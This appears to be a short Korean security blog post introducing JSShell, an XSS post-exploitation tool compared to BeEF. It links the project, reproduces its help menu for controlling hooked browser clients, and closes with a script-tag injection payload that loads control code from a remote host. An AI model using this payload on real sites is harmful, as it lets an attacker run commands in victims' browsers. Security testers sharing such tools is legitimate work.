git 보다가 재미있는 툴 있어 공유드립니다. JSSHELL이라 툴로 XSS Post Exploit 툴 정도로 보심 되고 요약하면 beef의 Command line 버전이라고 생각하시면 좋을 것 같습니다.
https://github.com/Den1al/JSShell
╦╔═╗┌─┐┬ ┬┌─┐┬ ┬
║╚═╗└─┐├─┤├┤ │ │
╚╝╚═╝└─┘┴ ┴└─┘┴─┘┴─┘ 2.0
by @Daniel_Abeles
>> help
Documented commands (type help <topic>):
General Commands
--------------------------------------------------------------------------------
edit Edit a file in a text editor
help List available commands or provide detailed help for a specific command
history View, run, edit, save, or clear previously entered commands
ipy Enter an interactive IPython shell
py Invoke Python command or shell
quit Exit this application
Shell Based Operations
--------------------------------------------------------------------------------
back Un-select the current selected client
clients List and control the clients that have registered to our system
commands Show the executed commands on the selected client
dump Dumps a command to the disk
execute Execute commands on the selected client
select Select a client as the current client
>>
분석 과정에서 쓸일은 거의 없지만 추가적인 영향력 테스트나 장난감으로 가지고 놀기 좋아보여요. 다른 XSS Post Exploit 툴과 비슷하게 서버 실행하고 아래 path(/content/js)를 삽입해서 나머지 처리 로직을 불러올 수 있습니다.
<script src="http://192.168.0.14/content/js"></script>